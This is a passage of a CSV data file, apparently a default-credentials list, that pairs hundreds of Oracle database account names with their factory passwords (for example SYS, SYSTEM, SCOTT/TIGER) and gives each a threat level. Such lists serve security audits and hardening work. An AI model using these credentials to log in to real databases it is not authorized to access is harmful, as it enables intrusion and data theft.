serious),, +oracle,Database,Any,,ORACLE,ORACLE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORADBA,ORADBAPASS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORANGE,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORAPROBE,ORAPROBE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORAREGSYS,ORAREGSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORASSO,ORASSO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORASSO_DS,ORASSO_DS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORASSO_PA,ORASSO_PA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORASSO_PS,ORASSO_PS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORASSO_PUBLIC,ORASSO_PUBLIC,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORASTAT,ORASTAT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORCLADMIN,WELCOME,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORDCOMMON,ORDCOMMON,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORDPLUGINS,ORDPLUGINS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ORDSYS,ORDSYS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OSE$HTTP$ADMIN,INVALID,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OSE$HTTP$ADMIN,Invalid password,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OSM,OSM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OSP22,OSP22,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OSSAQ_HOST,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OSSAQ_PUB,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OSSAQ_SUB,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OTA,OTA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OUTLN,OUTLN,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OWA,OWA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OWA_PUBLIC,OWA_PUBLIC,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OWF_MGR,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OWF_MGR,OWF_MGR,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OWNER,OWNER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,OZF,OZF,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OZP,OZP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,OZS,OZS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,PA,PA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,PANAMA,PANAMA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PATROL,PATROL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PAUL,PAUL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PERFSTAT,PERFSTAT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PERSTAT,PERSTAT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PJM,PJM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,PLANNING,PLANNING,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PLEX,PLEX,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PLSQL,SUPERSECRET,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PM,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PM,PM,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PM,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PMI,PMI,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,PN,PN,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,PO,PO,Threatcon 1 (most serious),, +oracle,Database,Any,,PO7,PO7,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PO8,PO8,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,POA,POA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,POM,POM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,PORTAL,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30,PORTAL30,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30,PORTAL31,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30_ADMIN,PORTAL30_ADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30_DEMO,PORTAL30_DEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30_PS,PORTAL30_PS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30_PUBLIC,PORTAL30_PUBLIC,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30_SSO,PORTAL30_SSO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30_SSO_ADMIN,PORTAL30_SSO_ADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30_SSO_PS,PORTAL30_SSO_PS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL30_SSO_PUBLIC,PORTAL30_SSO_PUBLIC,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL_APP,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL_DEMO,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL_DEMO,PORTAL_DEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL_PUBLIC,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PORTAL_SSO_PS,PORTAL_SSO_PS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,POS,POS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,POWERCARTUSER,POWERCARTUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PRIMARY,PRIMARY,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PSA,PSA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,PSB,PSB,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,PSP,PSP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,PUBSUB,PUBSUB,Threatcon 1 (most serious),, +oracle,Database,Any,,PUBSUB1,PUBSUB1,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,PV,PV,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,QA,QA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,QDBA,QDBA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QP,QP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,QS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS,QS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_ADM,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_ADM,QS_ADM,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_ADM,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_CB,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_CB,QS_CB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_CB,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_CBADM,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_CBADM,QS_CBADM,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_CBADM,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_CS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_CS,QS_CS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_CS,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_ES,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_ES,QS_ES,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_ES,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_OS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_OS,QS_OS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_OS,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_WS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_WS,QS_WS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,QS_WS,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,RE,RE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,REPADMIN,REPADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,REPORTS,REPORTS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,REPORTS_USER,OEM_TEMP,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,REP_MANAGER,DEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,REP_OWNER,DEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,REP_OWNER,REP_OWNER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,REP_USER,DEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,RG,RG,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,RHX,RHX,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,RLA,RLA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,RLM,RLM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,RMAIL,RMAIL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,RMAN,RMAN,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,RRS,RRS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SAMPLE,SAMPLE,Threatcon 1 (most serious),, +oracle,Database,Any,,SAP,6071992,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SAP,SAPR3,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SAPR3,SAP,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SCOTT,TIGER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SCOTT,TIGGER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SDOS_ICSAP,SDOS_ICSAP,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SECDEMO,SECDEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SERVICECONSUMER1,SERVICECONSUMER1,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SH,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SH,SH,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SH,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SITEMINDER,SITEMINDER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SI_INFORMTN_SCHEMA,SI_INFORMTN_SCHEMA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SLIDE,SLIDEPW,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SPIERSON,SPIERSON,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SSP,SSP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,STARTER,STARTER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,STRAT_USER,STRAT_PASSWD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SWPRO,SWPRO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SWUSER,SWUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SYMPA,SYMPA,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SYS,0RACL3,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,0RACL38,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,0RACL38I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,0RACL39,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,0RACL39I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,0RACLE,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,0RACLE8,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,0RACLE8I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,0RACLE9,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,0RACLE9I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,CHANGE_ON_INSTALL,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,D_SYSPW,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,MANAG3R,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,MANAGER,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,SYS,ORACL3,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,ORACLE,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,ORACLE8,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,ORACLE8I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,ORACLE9,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,ORACLE9I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,SYS,Threatcon 1 (most serious),, +oracle,Database,Any,,SYS,SYSPASS,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSADM,SYSADM,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SYSADMIN,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SYSADMIN,SYSADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,SYSMAN,OEM_TEMP,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSMAN,SYSMAN,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACL3,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACL38,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACL38I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACL39,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACL39I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACLE,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACLE8,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACLE8I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACLE9,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,0RACLE9I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,CHANGE_ON_INSTALL,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,SYSTEM,D_SYSPW,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,D_SYSTPW,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,MANAG3R,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,MANAGER,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,ORACL3,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,ORACLE,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,ORACLE8,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,ORACLE8I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,ORACLE9,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,ORACLE9I,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,SYSTEM,Threatcon 1 (most serious),, +oracle,Database,Any,,SYSTEM,SYSTEMPASS,Threatcon 1 (most serious),, +oracle,Database,Any,,TAHITI,TAHITI,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TALBOT,MT6CH5,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TDOS_ICSAP,TDOS_ICSAP,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TEC,TECTEC,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TEST,PASSWD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TEST,TEST,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TESTPILOT,TESTPILOT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TEST_USER,TEST_USER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,THINSAMPLE,THINSAMPLEPW,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TIBCO,TIBCO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TIP37,TIP37,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TRACESVR,TRACE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TRAVEL,TRAVEL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TSDEV,TSDEV,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TSUSER,TSUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,TURBINE,TURBINE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,UDDISYS,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,ULTIMATE,ULTIMATE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,UM_ADMIN,UM_ADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,UM_CLIENT,UM_CLIENT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER,USER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER0,USER0,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER1,USER1,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER2,USER2,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER3,USER3,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER4,USER4,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER5,USER5,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER6,USER6,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER7,USER7,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER8,USER8,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER9,USER9,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USER_NAME,PASSWORD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,USUARIO,CLAVE,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,UTILITY,UTILITY,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,UTLBSTATU,UTLESTAT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,VEA,VEA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,VEH,VEH,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,VERTEX_LOGIN,VERTEX_LOGIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,VIDEOUSER,VIDEOUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,VIF_DEVELOPER,VIF_DEV_PWD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,VIRUSER,VIRUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,VPD_ADMIN,AKF7D98S2,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,VRR1,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,VRR1,VRR1,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,VRR1,VRR2,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WEBCAL01,WEBCAL01,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WEBDB,WEBDB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WEBREAD,WEBREAD,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WEBSYS,MANAGER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WEBUSER,YOUR_PASS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WEST,WEST,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WFADMIN,WFADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WH,WH,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,WIP,WIP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,WIRELESS,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WKADMIN,WKADMIN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WKPROXY,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WKPROXY,UNKNOWN,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WKPROXY,WKPROXY,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WKSYS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WKSYS,WKSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WKUSER,WKUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WK_PROXY,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WK_SYS,,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WK_TEST,WK_TEST,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WMS,WMS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,WMSYS,WMSYS,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WOB,WOB,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WPS,WPS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,WSH,WSH,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,WSM,WSM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,WWW,WWW,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,WWWUSER,WWWUSER,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,XADEMO,XADEMO,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,XDB,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,XDP,XDP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,XLA,XLA,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,XNC,XNC,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,XNI,XNI,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,XNM,XNM,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,XNP,XNP,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,XNS,XNS,Threatcon 2 (1 is most serious),, +oracle,Database,Any,,XPRT,XPRT,Threatcon 3 (1 is most serious),, +oracle,Database,Any,,XTR,XTR,Threatcon 2 (1 is most serious),, +oracle,Internet Directory Service,,,cn=orcladmin,welcome,,, +oracle,Internet Directory Service,,,cn=orcladmin,welcome,,any, +oracle,Oracle RDBMS,,,ADAMS,WOOD,,, +oracle,Oracle RDBMS,,,APPLSYS,APPLSYS,,, +oracle,Oracle RDBMS,,,APPS,APPS,,, +oracle,Oracle RDBMS,,,AQDEMO,AQDEMO,,, +oracle,Oracle RDBMS,,,AQUSER,AQUSER,,, +oracle,Oracle RDBMS,,,AURORA$ORB$UNAUTHENTICATED,INVALID,,, +oracle,Oracle RDBMS,,,AURORA@ORB@UNAUTHENTICATED,INVALID,,, +oracle,Oracle RDBMS,,,BLAKE,PAPER,,, +oracle,Oracle RDBMS,,,CATALOG,CATALOG,,, +oracle,Oracle RDBMS,,,CDEMO82,CDEMO82,,, +oracle,Oracle RDBMS,,,CDEMOCOR,CDEMOCOR,,, +oracle,Oracle RDBMS,,,CDEMORID,CDEMORID,,, +oracle,Oracle RDBMS,,,CDEMOUCB,CDEMOUCB,,, +oracle,Oracle RDBMS,,,CLARK,CLOTH,,, +oracle,Oracle RDBMS,,,CTXDEMO,CTXDEMO,,, +oracle,Oracle RDBMS,,,CTXSYS,,,, +oracle,Oracle RDBMS,,,DEMO,DEMO,,, +oracle,Oracle RDBMS,,,DEMO8,DEMO8,,, +oracle,Oracle RDBMS,,,EMP,EMP,,, +oracle,Oracle RDBMS,,,FND,FND,,, +oracle,Oracle RDBMS,,,GPFD,GPFD,,, +oracle,Oracle RDBMS,,,GPLD,GPLD,,, +oracle,Oracle RDBMS,,,JONES,STEEL,,, +oracle,Oracle RDBMS,,,MILLER,MILLER,,, +oracle,Oracle RDBMS,,,MMO2,MMO2,,, +oracle,Oracle RDBMS,,,MOREAU,MOREAU,,, +oracle,Oracle RDBMS,,,MTYSYS,MTYSYS,,, +oracle,Oracle RDBMS,,,NAMES,NAMES,,, +oracle,Oracle RDBMS,,,OCITEST,OCITEST,,, +oracle,Oracle RDBMS,,,ORDPLUGINS,ORDPLUGINS,,, +oracle,Oracle RDBMS,,,ORDSYS,ORDSYS,,, +oracle,Oracle RDBMS,,,OUTLN,OUTLN,,, +oracle,Oracle RDBMS,,,POWERCARTUSER,POWERCARTUSER,,, +oracle,Oracle RDBMS,,,PRIMARY,PRIMARY,,, +oracle,Oracle RDBMS,,,RE,RE,,, +oracle,Oracle RDBMS,,,RMAIL,RMAIL,,, +oracle,Oracle RDBMS,,,RMAN,RMAN,,, +oracle,Oracle RDBMS,,,SCOTT,TIGER,,, +oracle,Oracle RDBMS,,,SECDEMO,SECDEMO,,, +oracle,Oracle RDBMS,,,SYSADM,SYSADM,,, +oracle,Oracle RDBMS,,,SYSTEM,MANAGER,,, +oracle,Oracle RDBMS,,,TRACESRV,TRACE,,, +oracle,Oracle RDBMS,,,TSDEV,TSDEV,,, +oracle,Oracle RDBMS,,,TSUSER,TSUSER,,, +oracle,Oracle RDBMS,,,USER0,USER0,,, +oracle,Oracle RDBMS,,,USER1,USER1,,, +oracle,Oracle RDBMS,,,USER2,USER2,,, +oracle,Oracle RDBMS,,,USER3,USER3,,, +oracle,Oracle RDBMS,,,USER4,USER4,,, +oracle,Oracle RDBMS,,,USER5,USER5,,, +oracle,Oracle RDBMS,,,USER6,USER6,,, +oracle,Oracle RDBMS,,,USER7,USER7,,, +oracle,Oracle RDBMS,,,USER8,USER8,,, +oracle,Oracle RDBMS,,,USER9,USER9,,, +oracle,Oracle RDBMS,,7 and 8,ADAMS,WOOD,,, +oracle,Oracle RDBMS,,7 and 8,APPLSYS,APPLSYS,,, +oracle,Oracle RDBMS,,7 and 8,APPS,APPS,,, +oracle,Oracle RDBMS,,7 and 8,AURORA$ORB$UNAUTHENTICATED,INVALID,,, +oracle,Oracle RDBMS,,7 and 8,AURORA@ORB@UNAUTHENTICATED,INVALID,,, +oracle,Oracle RDBMS,,7 and 8,BLAKE,PAPER,,, +oracle,Oracle RDBMS,,7 and 8,CLARK,CLOTH,,, +oracle,Oracle RDBMS,,7 and 8,CTXDEMO,CTXDEMO,,, +oracle,Oracle RDBMS,,7 and 8,CTXSYS,CTXSYS,,, +oracle,Oracle RDBMS,,7 and 8,DBSNMP,DBSNMP,,, +oracle,Oracle RDBMS,,7 and 8,DEMO,DEMO,,, +oracle,Oracle RDBMS,,7 and 8,JONES,STEEL,,, +oracle,Oracle RDBMS,,7 and 8,MDSYS,MDSYS,,, +oracle,Oracle RDBMS,,7 and 8,NAMES,NAMES,,, +oracle,Oracle RDBMS,,7 and 8,ORDPLUGINS,ORDPLUGINS,,, +oracle,Oracle RDBMS,,7 and 8,ORDSYS,ORDSYS,,, +oracle,Oracle RDBMS,,7 and 8,OUTLN,OUTLN,,, +oracle,Oracle RDBMS,,7 and 8,RMAN,RMAN,,, +oracle,Oracle RDBMS,,7 and 8,SCOTT,TIGER,,, +oracle,Oracle RDBMS,,7 and 8,SYS,CHANGE_ON_INSTALL,,, +oracle,Oracle RDBMS,,7 and 8,SYSADM,SYSADM,,, +oracle,Oracle RDBMS,,7 and 8,SYSTEM,MANAGER,,, +oracle,Oracle RDBMS,,7 and 8,TRACESRV,TRACE,,, +oracle,Oracle RDBMS,,8i Linux,MODTEST,YES,,, +oracle,Oracle RDBMS,,8i WinNT,MTYSYS,MTYSYS,,, +oracle,Oracle RDBMS,,8i WinNT,RE,RE,,, +oracle,Oracle RDBMS,,8i WinNT,RMAIL,RMAIL,,, +oracle,Oracle RDBMS,,8i WinNT,SAMPLE,SAMPLE,,, +oracle,Oracle RDBMS,,8i,AQDEMO,AQDEMO,,, +oracle,Oracle RDBMS,,8i,AQUSER,AQUSER,,, +oracle,Oracle RDBMS,,8i,CATALOG,CATALOG,,, +oracle,Oracle RDBMS,,8i,CDEMO82,CDEMO82,,, +oracle,Oracle RDBMS,,8i,CDEMOCOR,CDEMOCOR,,, +oracle,Oracle RDBMS,,8i,CDEMORID,CDEMORID,,, +oracle,Oracle RDBMS,,8i,CDEMOUCB,CDEMOUCB,,, +oracle,Oracle RDBMS,,8i,COMPANY,COMPANY,,, +oracle,Oracle RDBMS,,8i,DEMO8,DEMO8,,, +oracle,Oracle RDBMS,,8i,EMP,EMP,,, +oracle,Oracle RDBMS,,8i,EVENT,EVENT,,, +oracle,Oracle RDBMS,,8i,FINANCE,FINANCE,,, +oracle,Oracle RDBMS,,8i,FND,FND,,, +oracle,Oracle RDBMS,,8i,GPFD,GPFD,,, +oracle,Oracle RDBMS,,8i,GPLD,GPLD,,, +oracle,Oracle RDBMS,,8i,MFG,MFG,,, +oracle,Oracle RDBMS,,8i,MILLER,MILLER,,, +oracle,Oracle RDBMS,,8i,MMO2,MMO2,,, +oracle,Oracle RDBMS,,8i,MOREAU,MOREAU,,, +oracle,Oracle RDBMS,,8i,OCITEST,OCITEST,,, +oracle,Oracle RDBMS,,8i,PO,PO,,, +oracle,Oracle RDBMS,,8i,POWERCARTUSER,POWERCARTUSER,,, +oracle,Oracle RDBMS,,8i,PRIMARY,PRIMARY,,, +oracle,Oracle RDBMS,,8i,PUBSUB,PUBSUB,,, 